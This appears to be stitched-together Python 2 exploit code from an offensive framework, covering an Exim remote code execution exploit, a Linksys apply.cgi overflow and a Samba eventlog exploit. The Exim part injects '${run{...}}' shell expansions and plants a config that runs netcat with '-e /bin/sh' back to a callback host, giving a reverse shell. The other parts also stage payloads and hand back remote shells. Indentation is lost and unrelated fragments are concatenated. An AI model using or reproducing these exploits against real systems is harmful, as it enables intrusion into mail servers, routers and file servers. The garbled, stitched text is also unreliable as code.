log += " " + str(hs)
p2 = remaining - p1
h_name = wp_randomstring(10)
padding = wp_randomstring(128)
h = "%s: %s\n" % (h_name, padding)
h = h[0:(p2 - 1)] + "\n"
hs += h
log += " " + h
packet1 = "".join(hs)
h_name = wp_randomstring(7).upper()
packet2 = h_name + ": "
for i in range(51):
for k in range(3, 13):
packet2 += "${run{/bin/sh -c 'exec /bin/sh -i <&%s >&0 2>&0'}} " % k
packet2 += "\n"
payload = ""
while (len(payload) < msgSz):
payload += (wp_randomstring(254) + "\r\n") * 16384
s.sendall(packet1)
s.sendall(packet2)
s.sendall(payload)
s.sendall("\r\n.\r\n")
reply = s.recv(128)
if not '552 Message size exceeds maximum permitted' in reply:
self.log(
"WP> Target appears not to be vulnerable - exploit failed.")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
s.send("MAIL FROM: %s\r\n" % self.from_addr)
reply = s.recv(128)
if not 'sh-' in reply:
self.log(
"WP> Target appears not to be vulnerable - exploit failed.")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
self.log("WP> Sending Exploit: Stage 2")
s.sendall(
"echo \'spool_directory = ${run{/bin/nc -n %s %s -e /bin/sh &}}\' > /var/spool/exim4/%s\n"
% (self.callback.ip, self.rcv_port, self.backdoor))
s.sendall(
"PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin exim -C/var/spool/exim4/%s -q;rm -rf /var/spool/exim4/%s\n"
% (self.backdoor, self.backdoor))
self.log("WP> Awaiting connectback")
lsock.set_timeout(60)
try:
(s2, addr) = lsock.accept()
s2.set_timeout(2)
except:
self.log("WP> Connectback failed")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
telnetshell = Telnet()
telnetshell.sock = s2
try:
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.logfunction,
simpleShell=1)
except:
self.log("WP> Shell listener failed - connection closed")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
node = unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
self.setInfo("WP> %s attacking %s:%d - completed" %
(NAME, self.host, self.port))
return node
class theexploit(tcpexploit, linksysapplycgiExploit):
def __init__(self):
tcpexploit.__init__(self)
self.port = 80
self.setHost("")
self.setVersion(1)
#self.method=1
self.cmdline = 0
self.setInfo(DESCRIPTION)
return
def run(self):
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.setInfo("%s attacking %s:%d" % (NAME, self.host, self.port))
self.INFO, self.retaddr, self.ovfsize = targets[self.version]
return self.dorun()
def dorun(self):
linksysapplycgiExploit.__init__(self, self.host, self.port)
self.sock = self.attack()
if not self.sock:
self.log("exploitation failed")
return 0
self.setInfo("%s %s:%d successfully exploited!" %
(NAME, self.host, self.port))
self.t = Telnet()
self.t.sock = self.sock
self.log("restarting httpd...")
self.t.write("/usr/sbin/httpd;/sbin/check_ps >/dev/null 2>&1;\n")
if self.cmdline:
self.proxy()
return
try:
shell = shelllistener(shellfromtelnet(self.t),
logfunction=self.logfunction,
simpleShell=1)
except:
self.log(
"Could not make a shell listener - connection was closed. Exploit most likely failed."
)
self.setProgress(-1)
return 0
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
return node
def displayVersions(self):
for a in range(0, len(targets)):
print "%d : %s" % (a, targets[a][0])
return
def usage(self):
print "Usage: " + sys.argv[0] + " -t target [ -p 80] [-s ssl]"
self.displayVersions()
def run(self):
self.get_args()
self.host = self.target.interface
if self.version not in VERSIONS:
self.log('### Error: no such version')
return None
desc, stage0, stage1, shell_type = VERSIONS[self.version]
self.log('Attacking %s:%s using: %s' % (self.host, self.port, desc))
if self.covertness >= 2:
self.log(
"DCERPC crypto enabled, set covertness to 1 and try again if exploit fails!"
)
self.privacy = True
if self.covertness >= 5 and self.covertness < 11:
self.log('Crypto + moderate SMB fragmentation')
self.frag_level = 1
elif self.covertness == 11:
self.log('Crypto + MAX fragmentation (VERY SLOW)')
self.frag_level = 2
try:
x = Samba(self.host,
privacy=self.privacy,
payload=stage0,
frag_level=self.frag_level)
if self.debug == True:
self.log('### Attach ...')
sys.stdin.read(1)
self.log('### Computer Hacking: %s' % self.host)
s, resp = x.ndr_push_eventlog_reportevent()
if 'JINX' in resp:
self.log('### Succesfully Hacked Computer!')
self.log('### Staging to stage1 payload, version: %s' % desc)
s.send('JINX')
s.send(struct.pack('<L', len(stage1)) + stage1)
if shell_type == 'shell':
tn = Telnet()
tn.sock = s
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict['passednodes'][0]
node.shell = shelllistener(shellfromtelnet(tn),
simpleShell=1)
return node
if shell_type == 'mosdef':
node = linuxNode()
node.parentnode = self.argsDict['passednodes'][0]
shellServer = MosdefShellServer('Linux', 'i386')
shellServer(s, node)
node.startup()
return node
else:
self.log('### Failed ... version < 3.4.x or NX enabled ?')
except XError, e:
self.log('### Fatal Exploit Error: %s' % e)